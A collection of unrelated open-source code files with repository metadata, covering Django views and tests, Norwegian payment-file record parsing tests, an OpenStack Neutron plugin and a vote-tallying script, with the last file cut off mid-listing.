assert np.all(ndvi_header.list_available_fracnums() ==
qa_header.list_available_fracnums())
fractions = np.intersect1d(fractions,
ndvi_header.list_available_fracnums())
print '->', len(fractions), 'available'
sys.stdout.flush()
| {
"content_hash": "22df546ebc6f33d958db661bc50c4a13",
"timestamp": "",
"source": "github",
"line_count": 76,
"max_line_length": 78,
"avg_line_length": 31.407894736842106,
"alnum_prop": 0.6351068286552157,
"repo_name": "terrai/rastercube",
"id": "23f08c97edc1d0e766ccfd658d7eee505bc27c04",
"size": "2387",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rastercube/scripts/show_available_fractions.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "194904"
},
{
"name": "Ruby",
"bytes": "2529"
},
{
"name": "Shell",
"bytes": "6960"
}
],
"symlink_target": ""
} |
import time
from django.core.management.base import BaseCommand
from api.util import expire_inboxes, expire_items, expire_requests
class Command(BaseCommand):
help = 'Background cleanup task'
def handle(self, *args, **options):
inboxes = expire_inboxes()
print('expired %d inboxes' % inboxes)
# expire items of remaining inboxes
items, inboxes = expire_items()
print('expired %d items in %d active inboxes' % (items, inboxes))
# we expect this command to run once per minute, so to achieve
# a 10 second interval, we'll do 6 iterations within a
# single run
for n in range(0, 6):
if n != 0:
time.sleep(10)
requests = expire_requests()
print('expired %d requests' % requests)
| {
"content_hash": "56066a42a5be3ac3a969af9bc87190f8",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 67,
"avg_line_length": 31.130434782608695,
"alnum_prop": 0.7039106145251397,
"repo_name": "fanout/webhookinbox",
"id": "db42a1c4da62f83ae0b09fed18611bc1ae96e3d2",
"size": "716",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "api/management/commands/cleanup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "8911"
},
{
"name": "Dockerfile",
"bytes": "493"
},
{
"name": "HTML",
"bytes": "13340"
},
{
"name": "JavaScript",
"bytes": "44101"
},
{
"name": "Makefile",
"bytes": "4590"
},
{
"name": "Procfile",
"bytes": "45"
},
{
"name": "Python",
"bytes": "45452"
},
{
"name": "Shell",
"bytes": "56"
}
],
"symlink_target": ""
} |
from datetime import date
from typing import List
import pytest
from netsgiro import (
AssignmentType,
AvtaleGiroRegistrationType,
RecordType,
ServiceCode,
TransactionType,
)
from netsgiro.records import (
AssignmentEnd,
AssignmentStart,
AvtaleGiroAgreement,
Record,
TransactionAmountItem1,
TransactionAmountItem2,
TransactionAmountItem3,
TransactionSpecification,
TransmissionEnd,
TransmissionStart,
)
def test_transmission_start():
record = TransmissionStart.from_string(
'NY000010555555551000081000080800000000000000000000000000000000000000000000000000'
)
assert record.service_code == ServiceCode.NONE
assert record.RECORD_TYPE == RecordType.TRANSMISSION_START
assert record.data_transmitter == '55555555'
assert record.transmission_number == '1000081'
assert record.data_recipient == '00008080'
def test_transmission_start_fails_when_invalid_format():
line = 'XX' + ('0' * 78)
with pytest.raises(
ValueError,
match=f'{line!r} did not match TransmissionStart record format',
):
TransmissionStart.from_string(line)
def test_transmission_end():
record = TransmissionEnd.from_string(
'NY000089000000060000002200000000000000600170604000000000000000000000000000000000'
)
assert record.service_code == ServiceCode.NONE
assert record.RECORD_TYPE == RecordType.TRANSMISSION_END
assert record.num_transactions == 6
assert record.num_records == 22
assert record.total_amount == 600
assert record.nets_date == date(2004, 6, 17)
def test_assignment_start_for_avtalegiro_payment_requests():
record = AssignmentStart.from_string(
'NY210020000000000400008688888888888000000000000000000000000000000000000000000000'
)
assert record.service_code == ServiceCode.AVTALEGIRO
assert record.RECORD_TYPE == RecordType.ASSIGNMENT_START
assert record.assignment_type == AssignmentType.TRANSACTIONS
assert record.agreement_id == '000000000'
assert record.assignment_number == '4000086'
assert record.assignment_account == '88888888888'
def test_assignment_start_for_avtalegiro_agreements():
record = AssignmentStart.from_string(
'NY212420000000000400008688888888888000000000000000000000000000000000000000000000'
)
assert record.service_code == ServiceCode.AVTALEGIRO
assert record.RECORD_TYPE == RecordType.ASSIGNMENT_START
assert record.assignment_type == AssignmentType.AVTALEGIRO_AGREEMENTS
assert record.agreement_id is None
assert record.assignment_number == '4000086'
assert record.assignment_account == '88888888888'
def test_assignment_start_for_avtalegiro_cancellation():
record = AssignmentStart.from_string(
'NY213620000000000400008688888888888000000000000000000000000000000000000000000000'
)
assert record.service_code == ServiceCode.AVTALEGIRO
assert record.RECORD_TYPE == RecordType.ASSIGNMENT_START
assert record.assignment_type == AssignmentType.AVTALEGIRO_CANCELLATIONS
assert record.agreement_id is None
assert record.assignment_number == '4000086'
assert record.assignment_account == '88888888888'
def test_assignment_start_for_ocr_giro_transactions():
record = AssignmentStart.from_string(
'NY090020001008566000000299991042764000000000000000000000000000000000000000000000'
)
assert record.service_code == ServiceCode.OCR_GIRO
assert record.RECORD_TYPE == RecordType.ASSIGNMENT_START
assert record.assignment_type == AssignmentType.TRANSACTIONS
assert record.agreement_id == '001008566'
assert record.assignment_number == '0000002'
assert record.assignment_account == '99991042764'
def test_assignment_end_for_avtalegiro_payment_requests():
record = AssignmentEnd.from_string(
'NY210088000000060000002000000000000000600170604170604000000000000000000000000000'
)
assert record.service_code == ServiceCode.AVTALEGIRO
assert record.RECORD_TYPE == RecordType.ASSIGNMENT_END
assert record.assignment_type == AssignmentType.TRANSACTIONS
assert record.num_transactions == 6
assert record.num_records == 20
assert record.total_amount == 600
assert record.nets_date_earliest == date(2004, 6, 17)
assert record.nets_date_latest == date(2004, 6, 17)
def test_assignment_end_for_avtalegiro_agreements():
record = AssignmentEnd.from_string(
'NY212488000000060000002000000000000000000000000000000000000000000000000000000000'
)
assert record.service_code == ServiceCode.AVTALEGIRO
assert record.RECORD_TYPE == RecordType.ASSIGNMENT_END
assert record.assignment_type == AssignmentType.AVTALEGIRO_AGREEMENTS
assert record.num_transactions == 6
assert record.num_records == 20
assert record.total_amount is None
assert record.nets_date_earliest is None
assert record.nets_date_latest is None
def test_assignment_end_for_avtalegiro_cancellations():
record = AssignmentEnd.from_string(
'NY213688000000060000002000000000000000600170604170604000000000000000000000000000'
)
assert record.service_code == ServiceCode.AVTALEGIRO
assert record.RECORD_TYPE == RecordType.ASSIGNMENT_END
assert record.assignment_type == AssignmentType.AVTALEGIRO_CANCELLATIONS
assert record.num_transactions == 6
assert record.num_records == 20
assert record.total_amount == 600
assert record.nets_date_latest == date(2004, 6, 17)
assert record.nets_date_earliest == date(2004, 6, 17)
def test_assignment_end_for_ocr_giro_transactions():
record = AssignmentEnd.from_string(
'NY090088000000200000004200000000005144900200192200192200192000000000000000000000'
)
assert record.service_code == ServiceCode.OCR_GIRO
assert record.RECORD_TYPE == RecordType.ASSIGNMENT_END
assert record.assignment_type == AssignmentType.TRANSACTIONS
assert record.num_transactions == 20
assert record.num_records == 42
assert record.total_amount == 5144900
assert record.nets_date == date(1992, 1, 20)
assert record.nets_date_earliest == date(1992, 1, 20)
assert record.nets_date_latest == date(1992, 1, 20)
def test_transaction_amount_item_1_for_avtalegiro_payment_request():
record = TransactionAmountItem1.from_string(
'NY2121300000001170604 00000000000000100 008000011688373000000'
)
assert record.service_code == ServiceCode.AVTALEGIRO
assert record.RECORD_TYPE == RecordType.TRANSACTION_AMOUNT_ITEM_1
assert record.transaction_type == TransactionType.AVTALEGIRO_WITH_BANK_NOTIFICATION
assert record.transaction_number == 1
assert record.nets_date == date(2004, 6, 17)
assert record.amount == 100
assert record.kid == '008000011688373'
def test_transaction_amount_item_1_for_avtalegiro_cancellation():
record = TransactionAmountItem1.from_string(
'NY2193300000001170604 00000000000000100 008000011688373000000'
)
assert record.service_code == ServiceCode.AVTALEGIRO
assert record.RECORD_TYPE == RecordType.TRANSACTION_AMOUNT_ITEM_1
assert record.transaction_type == TransactionType.AVTALEGIRO_CANCELLATION
assert record.transaction_number == 1
assert record.nets_date == date(2004, 6, 17)
assert record.amount == 100
assert record.kid == '008000011688373'
def test_transaction_amount_item_1_for_ocr_giro_transactions():
record = TransactionAmountItem1.from_string(
'NY09103000000012001921320101464000000000000102000 0000531000000'
)
assert record.service_code == ServiceCode.OCR_GIRO
assert record.RECORD_TYPE == RecordType.TRANSACTION_AMOUNT_ITEM_1
assert record.transaction_type == TransactionType.FROM_GIRO_DEBITED_ACCOUNT
assert record.transaction_number == 1
assert record.nets_date == date(1992, 1, 20)
assert record.centre_id == '13'
assert record.day_code == 20
assert record.partial_settlement_number == 1
assert record.partial_settlement_serial_number == '01464'
assert record.sign == '0'
assert record.amount == 102000
assert record.kid == '0000531'
def test_transaction_amount_item_2_for_avtalegiro_payment_request():
record = TransactionAmountItem2.from_string(
'NY2121310000001NAVN 00000'
)
assert record.service_code == ServiceCode.AVTALEGIRO
assert record.RECORD_TYPE == RecordType.TRANSACTION_AMOUNT_ITEM_2
assert record.transaction_type == TransactionType.AVTALEGIRO_WITH_BANK_NOTIFICATION
assert record.transaction_number == 1
assert record.payer_name == 'NAVN'
assert record.reference is None
def test_transaction_amount_item_2_for_ocr_giro_transactions():
record = TransactionAmountItem2.from_string(
'NY091031000000196368271940990385620000000160192999905123410000000000000000000000'
)
assert record.service_code == ServiceCode.OCR_GIRO
assert record.RECORD_TYPE == RecordType.TRANSACTION_AMOUNT_ITEM_2
assert record.transaction_type == TransactionType.FROM_GIRO_DEBITED_ACCOUNT
assert record.transaction_number == 1
assert record.form_number == '9636827194'
assert record.payer_name is None
assert record.reference == '099038562'
assert record.bank_date == date(1992, 1, 16)
assert record.debit_account == '99990512341'
def test_transaction_amount_item_2_for_ocr_giro_with_data_in_filler_field():
record = TransactionAmountItem2.from_string(
'NY091031000000297975960160975960161883206160192999910055240000000000000000000000'
)
assert record.service_code == ServiceCode.OCR_GIRO
assert record.RECORD_TYPE == RecordType.TRANSACTION_AMOUNT_ITEM_2
assert record.transaction_type == TransactionType.FROM_GIRO_DEBITED_ACCOUNT
assert record.transaction_number == 2
assert record.form_number == '9797596016'
assert record.payer_name is None
assert record.reference == '097596016'
assert record.bank_date == date(1992, 1, 16)
assert record.debit_account == '99991005524'
assert record._filler == '1883206'
def test_transaction_amount_item_3_for_ocr_giro_transactions():
record = TransactionAmountItem3.from_string(
'NY0921320000001Foo bar baz 0000000000000000000000000'
)
assert record.service_code == ServiceCode.OCR_GIRO
assert record.RECORD_TYPE == RecordType.TRANSACTION_AMOUNT_ITEM_3
assert record.transaction_type == TransactionType.PURCHASE_WITH_TEXT
assert record.transaction_number == 1
assert record.text == 'Foo bar baz'
def test_transaction_specification_for_avtalegiro_payment_request():
record = TransactionSpecification.from_string(
'NY212149000000140011 Gjelder Faktura: 168837 Dato: 19/03/0400000000000000000000'
)
assert record.service_code == ServiceCode.AVTALEGIRO
assert record.RECORD_TYPE == RecordType.TRANSACTION_SPECIFICATION
assert record.transaction_type == TransactionType.AVTALEGIRO_WITH_BANK_NOTIFICATION
assert record.transaction_number == 1
assert record.line_number == 1
assert record.column_number == 1
assert record.text == ' Gjelder Faktura: 168837 Dato: 19/03/04'
def make_specification_records(
num_lines: int, num_columns: int = 2
) -> List[TransactionSpecification]:
return [
TransactionSpecification(
service_code=ServiceCode.AVTALEGIRO,
transaction_type=TransactionType.AVTALEGIRO_WITH_BANK_NOTIFICATION,
transaction_number=1,
line_number=line,
column_number=column,
text=f'Line {line}, column {column}',
)
for line in range(1, num_lines + 1)
for column in range(1, num_columns + 1)
]
def test_transaction_specification_to_text_with_max_number_of_records():
records = make_specification_records(42)
result = TransactionSpecification.to_text(records)
assert len(result.splitlines()) == 42
assert 'Line 1, column 1' in result
assert 'Line 42, column 2' in result
def test_transaction_specification_to_text_with_too_many_records():
records = make_specification_records(43)
with pytest.raises(ValueError, match='Max 84 specification records allowed, got 86'):
TransactionSpecification.to_text(records)
def test_avtalegiro_active_agreement():
record = AvtaleGiroAgreement.from_string(
'NY21947000000010 008000011688373J00000000000000000000000000000000000000'
)
assert record.service_code == ServiceCode.AVTALEGIRO
assert record.RECORD_TYPE == RecordType.TRANSACTION_AGREEMENTS
assert record.transaction_type == TransactionType.AVTALEGIRO_AGREEMENT
assert record.transaction_number == 1
assert record.registration_type == AvtaleGiroRegistrationType.ACTIVE_AGREEMENT
assert record.kid == '008000011688373'
assert record.notify is True
def test_avtalegiro_new_or_updated_agreement():
record = AvtaleGiroAgreement.from_string(
'NY21947000000011 008000011688373N00000000000000000000000000000000000000'
)
assert record.service_code == ServiceCode.AVTALEGIRO
assert record.RECORD_TYPE == RecordType.TRANSACTION_AGREEMENTS
assert record.transaction_type == TransactionType.AVTALEGIRO_AGREEMENT
assert record.transaction_number == 1
assert record.registration_type == AvtaleGiroRegistrationType.NEW_OR_UPDATED_AGREEMENT
assert record.kid == '008000011688373'
assert record.notify is False
def test__split_text_to_lines_and_columns_validation():
"""
Make sure the validation in
TransactionSpecification._split_text_to_lines_and_columns_validation works.
"""
# Test <= max line count
for i in [0, 1, 42]:
for _ in TransactionSpecification._split_text_to_lines_and_columns('test\n' * i):
pass
# Test > max line count
for i in [43, 100, 1000]:
with pytest.raises(ValueError, match='Max 42 specification lines allowed'):
for _ in TransactionSpecification._split_text_to_lines_and_columns('test\n' * i):
pass
# Test <= max line length
for i in [0, 1, 80]:
for _ in TransactionSpecification._split_text_to_lines_and_columns('i' * i):
pass
# Test > max line length
for i in [81, 100, 1000]:
with pytest.raises(ValueError, match='Specification lines must be max 80 chars long'):
for _ in TransactionSpecification._split_text_to_lines_and_columns('i' * i):
pass
def test_record__to_ocr():
"""Test that the record to_ocr abstract method is required."""
class SomeRecordDerivative(Record):
...
with pytest.raises(
TypeError,
match="Can't instantiate abstract class SomeRecordDerivative with abstract method",
):
SomeRecordDerivative()
| {
"content_hash": "709c3423cb414a894076ea6dcd4b70f3",
"timestamp": "",
"source": "github",
"line_count": 434,
"max_line_length": 94,
"avg_line_length": 34.40783410138249,
"alnum_prop": 0.7226947030067635,
"repo_name": "otovo/python-netsgiro",
"id": "cf846240479f77040256d5c0888a6cbfa595f532",
"size": "14933",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_record_parsing.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "128712"
}
],
"symlink_target": ""
} |
from django import template
from django.conf import settings
from django.urls import reverse
from django.utils.html import format_html
from django_gravatar.helpers import get_gravatar_url
register = template.Library()
@register.simple_tag
def user_link(user):
gravatar_url = get_gravatar_url(user.email, size=16)
profile_url = reverse('user_profile', args=[user.username])
return format_html("""<a href="{0}"><img class="gravatar-small" src="{1}"/>{2}</a>""", profile_url, gravatar_url, user.get_full_name())
@register.inclusion_tag('assets/asset_title.html')
def asset_title(asset, as_link):
return {'asset': asset, 'as_link': as_link}
@register.inclusion_tag('assets/asset_common.html')
def asset_common(user, asset, verbose):
return {'user': user, 'asset': asset, 'verbose': verbose}
@register.inclusion_tag('assets/asset_thumbnail.html')
def asset_thumbnail(asset, as_link=True):
return {'asset': asset, 'as_link': as_link}
| {
"content_hash": "abb7750477175cf189a180003aaa4c5c",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 139,
"avg_line_length": 36.84615384615385,
"alnum_prop": 0.7181628392484343,
"repo_name": "portnov/assethub",
"id": "9df9a352bff77bab4aaf788ae4564587ae8b1093",
"size": "958",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "assethub/assets/templatetags/common.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "5879"
},
{
"name": "HTML",
"bytes": "29411"
},
{
"name": "Python",
"bytes": "131052"
},
{
"name": "Shell",
"bytes": "135"
}
],
"symlink_target": ""
} |
from unittest import TestCase, main
import os
import time
import sys
import tempfile
import difflib
import svtools.varlookup
class IntegrationTest_varlookup(TestCase):
def run_integration_test(self):
test_directory = os.path.dirname(os.path.abspath(__file__))
test_data_dir = os.path.join(test_directory, 'test_data', 'varlookup')
input_a = os.path.join(test_data_dir, 'input_a.bed')
input_b = os.path.join(test_data_dir, 'input_b.bed')
expected_result = os.path.join(test_data_dir, 'expected.bed')
temp_descriptor, temp_output_path = tempfile.mkstemp(suffix='.bed')
with os.fdopen(temp_descriptor, 'w') as output_handle:
svtools.varlookup.varLookup(input_a, input_b, output_handle, 50, '#', 'TEST')
expected_lines = open(expected_result).readlines()
# set timestamp for diff
expected_lines[1] = '##fileDate=' + time.strftime('%Y%m%d') + '\n'
produced_lines = open(temp_output_path).readlines()
diff = difflib.unified_diff(produced_lines, expected_lines, fromfile=temp_output_path, tofile=expected_result)
result = ''.join(diff)
if result != '':
for line in result:
sys.stdout.write(line)
self.assertFalse(result)
os.remove(temp_output_path)
def run_issue_209_regression_test(self):
test_directory = os.path.dirname(os.path.abspath(__file__))
test_data_dir = os.path.join(test_directory, 'test_data', 'varlookup')
input_a = os.path.join(test_data_dir, 'input_a1.bed')
input_b = os.path.join(test_data_dir, 'input_b1.bed')
expected_result = os.path.join(test_data_dir, 'expected1.bed')
temp_descriptor, temp_output_path = tempfile.mkstemp(suffix='.bed')
with os.fdopen(temp_descriptor, 'w') as output_handle:
svtools.varlookup.varLookup(input_a, input_b, output_handle, 50, '#', 'TEST')
expected_lines = open(expected_result).readlines()
# set timestamp for diff
expected_lines[1] = '##fileDate=' + time.strftime('%Y%m%d') + '\n'
produced_lines = open(temp_output_path).readlines()
diff = difflib.unified_diff(produced_lines, expected_lines, fromfile=temp_output_path, tofile=expected_result)
result = ''.join(diff)
if result != '':
for line in result:
sys.stdout.write(line)
self.assertFalse(result)
os.remove(temp_output_path)
if __name__ == "__main__":
main()
| {
"content_hash": "65546435a72437455718c1f80f9eaa09",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 118,
"avg_line_length": 47.56603773584906,
"alnum_prop": 0.6295120983736613,
"repo_name": "hall-lab/svtools",
"id": "c931e62ee32c8a2216391c72daa2845f602a8fe1",
"size": "2521",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/varlookup_tests.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Perl",
"bytes": "2266"
},
{
"name": "Python",
"bytes": "468744"
},
{
"name": "Shell",
"bytes": "4721"
}
],
"symlink_target": ""
} |
from abc import abstractmethod
class Configurable(object):
class ConfigureResult(object):
def __init__(self):
self.message = ""
self.successed = True
@abstractmethod
def init_from_config(self, configure, **kwargs):
pass
@abstractmethod
def get_from_context(self, context):
pass
@abstractmethod
def set_to_context(self, context):
pass
| {
"content_hash": "17d82f85951f657657e356311ea3c2a9",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 52,
"avg_line_length": 17.12,
"alnum_prop": 0.6051401869158879,
"repo_name": "squall1988/lquant",
"id": "c6515909008a98cc7c339cc6b7af4abf356b181a",
"size": "444",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Configurable.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "248132"
},
{
"name": "Shell",
"bytes": "224"
}
],
"symlink_target": ""
} |
"""
Imageio is a Python library that provides an easy interface to read and
write a wide range of image data, including animated images, volumetric
data, and scientific formats. It is cross-platform, runs on Python 2.x
and 3.x, and is easy to install.
Main website: http://imageio.github.io
"""
__version__ = '1.4'
# Load some bits from core
from .core import FormatManager, RETURN_BYTES # noqa
# Instantiate format manager
formats = FormatManager()
# Load the functions
from .core.functions import help # noqa
from .core.functions import get_reader, get_writer # noqa
from .core.functions import imread, mimread, volread, mvolread # noqa
from .core.functions import imwrite, mimwrite, volwrite, mvolwrite # noqa
# Load function aliases
from .core.functions import read, save # noqa
from .core.functions import imsave, mimsave, volsave, mvolsave # noqa
# Load all the plugins
from . import plugins # noqa
# expose the show method of formats
show_formats = formats.show
# Clean up some names
del FormatManager
| {
"content_hash": "f6debeb6951234068ea63e1273e97c02",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 74,
"avg_line_length": 29.37142857142857,
"alnum_prop": 0.754863813229572,
"repo_name": "patricksnape/imageio",
"id": "4a43edcaed254751b0a992669f6a76e1ee1999a0",
"size": "1322",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "imageio/__init__.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "PowerShell",
"bytes": "6422"
},
{
"name": "Python",
"bytes": "630531"
}
],
"symlink_target": ""
} |
from django.db import models
class Category(models.Model):
title = models.CharField(max_length=200)
def __unicode__(self):
return self.title
| {
"content_hash": "f756518ff710e1cb86a1c83cd0312c40",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 44,
"avg_line_length": 20,
"alnum_prop": 0.68125,
"repo_name": "mozillazg/django-simple-projects",
"id": "517e52df7dd0147c17c478cbed077b6556b50ad2",
"size": "207",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "projects/custom-context-processors/hello/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "42173"
},
{
"name": "HTML",
"bytes": "8678"
},
{
"name": "JavaScript",
"bytes": "75416"
},
{
"name": "Python",
"bytes": "73644"
}
],
"symlink_target": ""
} |
from neutron_lib.api.definitions import network_ip_availability
from neutron_lib.db import utils as db_utils
from neutron_lib import exceptions
import neutron.db.db_base_plugin_v2 as db_base_plugin_v2
import neutron.db.network_ip_availability_db as ip_availability_db
class NetworkIPAvailabilityPlugin(ip_availability_db.IpAvailabilityMixin,
db_base_plugin_v2.NeutronDbPluginV2):
"""This plugin exposes IP availability data for networks and subnets."""
_instance = None
supported_extension_aliases = [network_ip_availability.ALIAS]
__filter_validation_support = True
@classmethod
def get_instance(cls):
if cls._instance is None:
cls._instance = cls()
return cls._instance
def get_plugin_description(self):
return "Provides IP availability data for each network and subnet."
@classmethod
def get_plugin_type(cls):
return "network-ip-availability"
def get_network_ip_availabilities(self, context, filters=None,
fields=None):
"""Returns ip availability data for a collection of networks."""
net_ip_availabilities = super(
NetworkIPAvailabilityPlugin, self
).get_network_ip_availabilities(context, filters)
return [db_utils.resource_fields(net_ip_availability, fields)
for net_ip_availability in net_ip_availabilities]
def get_network_ip_availability(self, context, id=None, fields=None):
"""Return ip availability data for a specific network id."""
filters = {'network_id': [id]}
result = self.get_network_ip_availabilities(context, filters)
if result:
return db_utils.resource_fields(result[0], fields)
else:
raise exceptions.NetworkNotFound(net_id=id)
| {
"content_hash": "c8b4c750931c6c2f9e58eb0fd6b2ab95",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 76,
"avg_line_length": 39.255319148936174,
"alnum_prop": 0.6693766937669376,
"repo_name": "mahak/neutron",
"id": "f95679ae763b03efb2a7fc0eb6e002375c172435",
"size": "2429",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "neutron/services/network_ip_availability/plugin.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jinja",
"bytes": "2773"
},
{
"name": "Mako",
"bytes": "1047"
},
{
"name": "Python",
"bytes": "15942116"
},
{
"name": "Ruby",
"bytes": "1257"
},
{
"name": "Shell",
"bytes": "83270"
}
],
"symlink_target": ""
} |
import sys
import os
import re
from paste.script.templates import var
from paste.script.templates import Template
from collective.generic.skel.buildout.common import boolify
class Package(Template):
"""
Package template to do a double namespace egg.
Althout it prentends to do that, it is a base for sub templates that need to have all sort
of variables defined. That's why there is some curious plone bits there.
"""
_template_dir = 'tmpl'
summary = "Template1 for cgwb testing"
egg_plugins = ['PasteScript',]
use_cheetah = True
vars = [
var('namespace', 'Namespace', default='%(namespace)s'),
var('nested_namespace', 'Nested Namespace', default='%(package)s'),
var('version', 'Version', default='1.0'),
var('author', 'Author', default = 'foo',),
var('author_email', 'Email', default = '%s@%s' % ('bar', 'localhost')),
var('tp3option', 'URL of homepage', default='http://python.org'),
var('tp3option3', 'One-line description of the package', default='Project %s'),
var('keywords', 'Space-separated keywords/tags'),
var('license_name', 'License name', default='GPL'),
var('project_name', 'Project namespace name (to override the first given project name forced by some derivated templates, left empty in doubt)', default=''),
]
def run(self, command, output_dir, vars):
self.output_dir = output_dir
self.boolify(vars)
self.pre(command, output_dir, vars)
# may we have register variables ?
if self.output_dir:
if not os.path.exists(self.output_dir):
os.makedirs(self.output_dir)
output_dir = self.output_dir
if not os.path.isdir(output_dir):
raise Exception('%s is not a directory' % output_dir)
self.write_files(command, self.output_dir, vars)
self.post(command, output_dir, vars)
if not command.options.quiet:
print "-" * 79
print "The template has been generated in %s" % self.output_dir
print "-" * 79
def boolify(self, d, keys=None):
return boolify(d, keys)
def read_vars(self, command=None):
vars = Template.read_vars(self, command)
infos = {}
project = ''
if command:
project = command.args[0]
from paste.script import pluginlib
self.module = self.__class__.__module__
def wrap_egg_info_dir(c, n):
print "%s" % (
" Monkey patching egg_info_dir "
)
return None
pluginlib.egg_info_dir = wrap_egg_info_dir
return vars
| {
"content_hash": "eff58ea735aff27f81c4caf598b5b977",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 165,
"avg_line_length": 37.09722222222222,
"alnum_prop": 0.6038936727817297,
"repo_name": "collective/collective.generic.webbuilder",
"id": "ea719edc68477b2b0d20f6061571e0abacf592bc",
"size": "2671",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/collective/generic/webbuilder/tests/egg/src/tp2/package.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "147995"
},
{
"name": "JavaScript",
"bytes": "335659"
},
{
"name": "Python",
"bytes": "79817"
},
{
"name": "Shell",
"bytes": "3596"
}
],
"symlink_target": ""
} |
"""
Licensed under CC Attribution http://creativecommons.org/licenses/by/3.0/
Copyright 2011, Steve Engledow
"""
def do_round(votes, counts = {}, loser=None):
for vote in votes:
for i in range(len(vote)):
if not loser:
if vote[i] not in counts:
counts[vote[i]] = 0
counts[vote[i]] += 1
break
else:
if vote[i] == loser:
for j in range(i+1, len(vote)):
if vote[j] in counts:
counts[vote[j]] += 1
break
break
elif vote[i] in counts:
break
print counts
# determine if there's a winner
total = sum(counts.values())
for choice in counts:
if counts[choice] > total / 2:
print choice, "wins!"
return
# otherwise, find the loser
loser = None
for choice in counts:
if not loser or counts[choice] < counts[loser]:
loser = choice
print loser, "loses"
del counts[loser]
do_round(votes, counts, loser = loser)
import sys
if len(sys.argv) != 2:
print "Expected a filename as the sole argument."
print "The file should be a space-separated list of vote preferences with each ballot separated by a newline."
else:
votes = []
f = open(sys.argv[1], 'r')
for line in f:
votes.append(line.split())
f.close()
do_round(votes)
| {
"content_hash": "0e2272513b4002bcb6e1d40c12db9bfb",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 114,
"avg_line_length": 28.547169811320753,
"alnum_prop": 0.5181758096497026,
"repo_name": "stilvoid/av",
"id": "4a2368e7af4c8acc2321130b1493ba8f88acc213",
"size": "1513",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "vote.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1513"
}
],
"symlink_target": ""
} |
"""Cms portfolio views"""
from datetime import datetime
from django import http
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse
from django.http.response import HttpResponseRedirect
from django.utils.translation import ugettext_lazy as _
from boski.views.crud import ListView, CreateView, UpdateView, DeleteView
from boski.mixins import LoginRequiredMixin
from ..models import Entry, Company
from .forms import EntryForm, CompanyForm
__author__ = 'Daniel Alkemic Czuba <[email protected]>'
class List(LoginRequiredMixin, ListView):
queryset = Entry.objects.all().filter(deleted_at__isnull=True)
breadcrumbs = ({'name': _('Portfolio'), 'url': 'cms:portfolio:index'},)
listingColumns = (
('id', '#'),
('name', _('Name')),
('created_at', _('Date created')),
('action', _('Actions'))
)
filters = (
('created_at__gte', {
'label': _('Created from'),
'type': 'text',
'class': 'calendar',
}),
('created_at__lte', {
'label': _('To'),
'type': 'text',
'class': 'calendar',
}),
)
mapColumns = {
'id': '_displayAsIs',
'name': '_displayEditLink',
'created_at': '_displayDate',
'action': '_displayActionWithActivationToggleLink',
}
def get_fields_name(self):
fields_name = super(List, self).get_fields_name()
return fields_name + ['activated_at', 'slug']
orderingColumns = {'id', 'name', 'created_at'}
searchColumns = {'name', 'description', 'technologies'}
class Create(LoginRequiredMixin, CreateView):
model = Entry
form_class = EntryForm
@property
def breadcrumbs(self):
return {'name': _('Portfolio'), 'url': 'cms:portfolio:index'}, \
{'name': self.name, 'url': 'cms:portfolio:create'}
class Update(LoginRequiredMixin, UpdateView):
model = Entry
form_class = EntryForm
@property
def breadcrumbs(self):
return {'name': _('Portfolio'), 'url': 'cms:portfolio:index'}, \
{'name': self.name, 'url': 'cms:portfolio:update',
'pk': self.get_object().pk}
class Delete(LoginRequiredMixin, DeleteView):
model = Entry
@property
def breadcrumbs(self):
return {'name': _('Portfolio'), 'url': 'cms:portfolio:index'}, \
{'name': self.name, 'url': 'cms:portfolio:delete',
'pk': self.get_object().pk}
@login_required
def toggle_active(request, pk):
entry = Entry.objects.non_deleted().get(pk=pk)
""" :type : Entry """
if entry.activated_at:
try:
entry.activated_at = False
entry.save()
messages.success(request, _('Entry has been deactivated'))
except:
messages.error(request, _('Error occurred during saving'))
else:
try:
entry.activated_at = datetime.now()
entry.save()
messages.success(request, _('Entry has been activated'))
except:
messages.error(request, _('Error occurred during saving'))
return HttpResponseRedirect(reverse('cms:portfolio:index'))
class CompanyList(LoginRequiredMixin, ListView):
queryset = Company.objects.all()
breadcrumbs = (
{'name': _('Portfolio'), 'url': 'cms:portfolio:index'},
{'name': _('Company'), 'url': 'cms:portfolio:company-index'},
)
listingColumns = (
('id', '#'),
('name', _('Name')),
('created_at', _('Date created')),
('action', _('Actions'))
)
mapColumns = {
'id': '_displayAsIs',
